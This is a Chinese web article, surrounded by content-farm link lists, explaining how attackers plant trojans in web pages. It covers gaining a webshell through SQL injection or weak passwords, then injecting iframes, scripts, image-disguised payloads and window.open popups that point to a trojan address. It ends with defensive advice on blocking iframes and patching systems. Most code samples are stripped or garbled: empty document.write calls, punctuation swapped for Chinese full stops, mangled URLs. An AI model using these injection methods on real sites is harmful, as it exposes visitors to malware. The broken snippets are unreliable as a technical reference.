关系经济人类预测化学自然
投稿投诉
自然科学
知识物理
化学生物
地理解释
预测理解
本质社会
人类现象
行为研究
经济政治
心理结构
关系指导
人文遗产

揭秘黑客们是怎么挂马的(常见的网页挂马方式)

8月8日 呛人心投稿
  揭秘黑客们是怎么挂马的(常见的网页挂马方式)所谓的挂马,就是黑客通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day,等各种方法获得网站管理员账号,然后登陆网站后台,通过数据库备份恢复或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP,然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒。下面就让我们来看看几种常见的挂马网站。
  (1)iframe框架挂马
  在网页上增加一行挂马的程序,例如:
  这种嵌入是的挂马非常常见,在Google中搜索发现的可能还有木马的网页,一般都是被这种方式挂马。这行语句就是在网页打开的时候,同时打开另外一个网页,当然这个网页可能包含大量的木马,也可能仅仅是为了骗取流量。
  如果我们的网页不使用iframe,我们可以屏蔽iframe属性,这样,即使网页被iframe挂马,也不会伤害到访问网站的用户。
  【原理】:
  IE5及其以后版本支持在CSS中使用expression,用来把CSS属性和javascript脚本关联起来,这里的CSS属性可以是元素固有的属性,也可以是自定义属性。
  我们在网页中增加如下的代码即可屏蔽iframe属性:
  iframe{a:expression(this。src’about:blank’,this。outerHTML);}
  iframe也可以采用加密的方式挂马,例如下面的代码:
  (2)script挂马
  通过script的调用来挂马,可以挂直接的html文件,也可以挂js文件,可以明文挂马,为了躲避追查,也有加密挂马的形式,形式各异,千差万别,主要方式如下:
  这是一个加密的挂马语句;
  2。1htm文件挂马:
  通过上传一个木马文件(x。htm)挂马,代码如下:
  document。write(
  )
  document。write()
  document。write()
  htm挂马代码:
  2。2js文件挂马
  通过上传一个木马文件(x。js)挂马,代码如下:
  document。write();
  JS挂马代码:
  当然也可以挂互联网上任何一台机器的x。js文件;
  2。3js变形加密
  (3)图片伪装挂马
  随着防毒技术的发展,图片木马技术逃避杀毒监视的新技术,攻击者将类似:http:www。xxx。comx。htm中的木马代码植入到x。gif图片文
  件中,这些嵌入代码的图片都可以用工具生成。图片木马生成后,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法,实例代码如:
  当用户打开http:www。x。comx。htm是,显示给用户的是http:www。x。comx。jpg,而http:www。x。comx。htm网页代码也随之运行。
  (4)其它的挂马方式
  4。1body挂马
  也可以在css的body中挂马
  body{
  backgroundimage:url(‘javascript:document。write()’)}
  4。2隐蔽挂马
  top。document。body。innerHTMLtop。document。body。innerHTML
  ‘’;
  4。3java的open函数挂马
  直接调用:
  window。open(x。htm,,toolbarno,locationno,directoriesno,statusno,menubarno,scrollbarsno,width1,height1);
  欺骗调用:
  页面要显示的内容
  functionwwwacom()
  {
  varurl网马地址;
  open(url,NewWindow,toolbarno,locationno,directoriesno,statusno,menubarno,scrollbarsno,resizableno,copyhistoryyes,w
  idth800,height600,left10,top10);
  }
  4。4伪装调用:
  形形色色的网页挂马,代码都十分简单,所以,互联网木马想要传播,就会不停的开发新的挂马方式,不停的加密隐藏自己,这样才能逃过各种安全软件的眼睛。其实,看看上文,很多语句都是编程常用的代码,只是使用的目的不一样罢了,了解了网页挂马的原理和方法,再防范网页挂马就容易多了。
  带木马的网页主要包括两种类型:一种自己本身就是木马网站,所有的页面都有木马,另一种是正常的网站,由于管理不善,被挂马,成为木马网站的一个中转站,看看google中这样的网站何其多,可能很多站长现在还不知道,呵呵,多学习学习吧,站长可不是那么好当的。
  不过,仅仅有了网络挂马的代码,也不一定一定能传播木马,只要我们加强防范,不让我们的网页被挂马,甚至,即使被挂马了,打开了木马网页,我们的系统没有漏洞,木马网页也同样不能发挥作用的。所以,最重要的安全防范方式就是定期给系统打补丁,几乎所有的木马网页都无法发挥作用了。
投诉 评论 转载

滴滴抽成多少(现在滴滴平台抽成是多少)打车支付49。65元,师傅到手只有36元,抽成27是不是太狠了?具体抽成比例无法查询?乘客给100块钱,到我手上才65块,35你们都敢抽?各种网约车平台真的是只有更……肺炎吃什么好(肺炎不能吃的食物)肺是至关重要的,但是又特别的娇嫩,平时的呼吸需要依靠肺部来进行气体交换,但是只要天气发生变化的话,并不是特别容易受到伤害,所以在日常生活中一定要注意保护肺部健康。一旦当肺……误工造句用误工造句大全【误工wgng】:1。指未能参加生产劳动而耽误的劳动日。(1)不违农时,减少误工,也十分重要。(2)上夜大既能学习,又不耽误工作,何乐而不为呢?(3)工头说发……揭秘黑客们是怎么挂马的(常见的网页挂马方式)揭秘黑客们是怎么挂马的(常见的网页挂马方式)所谓的挂马,就是黑客通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day,等各种方法获得网站管理员账号,然后……长跑前需要热身吗通过体育锻炼和训练从外表看,明显的变化是肌肉体积增大,主要表现在各种围度的增加上,不同专项运动对不同部位肌肉体积增大的影响不同。肌肉体积的增大是由于肌纤维增粗,还是肌纤维数目增……国际拉杆箱品牌排名(爱华仕拉杆箱)国际拉杆箱品牌排名1、软箱的好处就是箱体爱华表面有弹性,质量更别说了。实用时尚,这不是挑牌子是挑质量。2、根据出行具体情形确定选用硬箱还是软箱。2旅行箱的轮子分为单……成语典故不求甚解不求甚解这则成语的原意是读书只领会精神,不在一字一句的解释上多花工夫。现在则指学习不认真,不会深刻理解或指不深入了解情况。这个成语来源于晋。陶潜《五柳先生传》,好读书,不……爱尔兰牛肉价今日价调价爱尔兰牛肉价1、牛肉价格上涨了。籼米(晚籼米)粳米(普通)富士苹果长茄子牛肉等价格安徽合肥周谷堆农产品批发市场安徽大黄花鱼。2019年2020年5月全国牛肉今天批发价价格……德黑兰1943(德黑兰1943高清国语)德黑兰1943(德黑兰1943高清国语)《德黑兰43年》是前苏联拍摄的一部相当于谍战片的历史题材影片,公映于1981年。整个影片千头万绪,错综复杂,而且它没有采取一……小孩吐奶的原因(宝宝吐奶的2个原因)小孩吐奶的原因(宝宝吐奶的2个原因)刚有小宝宝的时候,每个家庭都会非常高兴,不过当宝宝出现一些小状况后,又会让新手爸妈们措手不及。吐奶是宝宝们都会出现的一种正常现象,有的……人为什么不能从容的活着人为什么不可以从容地活着?最主要的原因是因为恐惧。每个人都被一股强迫性的对生存的恐惧强逼着、停不下来,如果我们突然停下手头的事,跳出来看一下的话,会发现生存的恐惧究竟有多大,它……大状况影响女性健康女性18岁时超重易早逝一项针对102,400名女护士的调查研究表明,18岁时体重超标或有肥胖症的女性在青少年时期吸烟、饮酒均多于其他女性,并且锻炼身体的时间偏少。因此,在……
4600万买的别墅院外就是坟头是怎么回事信用卡能分期多久(信用卡分期怎么申请)五福是哪五福(你知道五福临门是指哪五福吗)朋友失恋了怎么办(情商高安慰人的句子)妆前乳什么牌子好(妆前水乳用什么牌子好)苹果今日市值蒸发多少钱衡水市今日猪价行情可以借钱的软件(有什么能借钱的app)为什么磨牙(治疗磨牙的小妙招)三十九级台阶(1978上译版三十九级台阶)甄嬛传的主题曲(这首甄嬛传主题曲)痛经是怎么(为什么会痛经)
会计每月工作总结孔雀鱼下的卵泡能变成小鱼吗,鱼苗适合生活在什么环境中脸部松弛下垂的方法低年级寒假日记400字精选范文电影里面的励志名言玻璃鞋小说双结局是怎样的作文日本妖刀是怎样的一把刀?戚继光是如何评价日本妖刀的?不舍索尼,你有很多PC玩家放不下?世界十大茶产地排行榜,中国排名第一踏上征程吧,少年卖一辆亏一辆!新能源行业火热,车企为何过冬?热传聚热点网

友情链接:中准网聚热点快百科快传网快生活快软网快好知文好找菏泽德阳山西湖州宝鸡上海茂名内江三亚信阳长春北海西安安徽黄石烟台沧州湛江肇庆鹤壁六安韶关成都钦州